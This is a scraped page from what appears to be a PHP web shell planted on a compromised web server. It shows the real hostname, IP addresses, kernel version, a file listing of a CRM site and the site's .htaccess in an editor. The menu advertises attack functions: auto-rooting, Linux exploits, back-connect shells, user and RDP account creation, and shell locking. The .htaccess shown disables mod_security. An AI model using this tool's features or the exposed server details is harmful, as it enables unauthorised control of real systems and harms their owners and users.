Linux webserver.lcwhost.net 5.10.0-12-amd64 #1 SMP Debian 5.10.103-1 (2022-03-07) x86_64
LiteSpeed
: 194.163.130.72 | : 216.73.216.224
Cant Read [ /etc/named.conf ]
7.4.33
admin
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
admin /
domains /
lcwhost.co.uk /
public_html /
crm /
[ HOME SHELL ]
Name
Size
Permission
Action
application
[ DIR ]
drwxrwxrwx
cgi-bin
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxrwxrwx
storage
[ DIR ]
drwxrwxrwx
updates
[ DIR ]
drwxrwxrwx
.htaccess
2.27
KB
-rw-rw-rw-
Documentation.pdf
7.29
MB
-rw-rw-rw-
index.php
2.92
KB
-rw-rw-rw-
robots.txt
26
B
-rw-rw-rw-
sitemap.xml
170
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
<IfModule mod_rewrite.c> <IfModule mod_negotiation.c> Options -MultiViews -Indexes </IfModule> RewriteEngine On # option to force redirect to ssl (https) - uncomment the two lines below # RewriteCond %{HTTPS} !=on # RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] # Handle Authorization Header RewriteCond %{HTTP:Authorization} . RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] # --------------------------------------------------------------------------------------- # MODULES - 4 Feb 2025 # rewrite the resources lower case URL to match the server directory case # https://domain.com/application/modules/foobar/resources # https://domain.com/application/Modules/Foobar/Resources # --------------------------------------------------------------------------------------- RewriteCond %{REQUEST_URI} ^/application/modules/ [NC] RewriteRule ^application/modules/(.*)$ /application/Modules/$1 [R=301,L] RewriteCond %{REQUEST_URI} ^/application/Modules/services/ [NC] RewriteRule ^application/Modules/services/(.*)$ /application/Modules/Services/$1 [R=301,L] RewriteCond %{REQUEST_URI} ^/application/Modules/Services/resources/ [NC] RewriteRule ^application/Modules/Services/resources/(.*)$ /application/Modules/Services/Resources/$1 [R=301,L] # Redirect Trailing Slashes If Not A Folder... RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} (.+)/$ RewriteRule ^ %1 [L,R=301] # Handle Front Controller... RewriteCond %{REQUEST_URI} !(\.css|\.js|\.svg|\.png|\.jpg|\.gif|robots\.txt|\.png|\.ttf|\.woff)$ [NC] RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^ index.php [L] </IfModule> # --------------------------------------------------------------------------------------- # Litespeed Server - 20 Jan 2025 # Disable POST request filtering that is causing 403 permission denied errors # when submutting forms on Litespeed servers # --------------------------------------------------------------------------------------- <IfModule Litespeed> <IfModule mod_security.c> SecRuleEngine Off </IfModule> </IfModule>
Close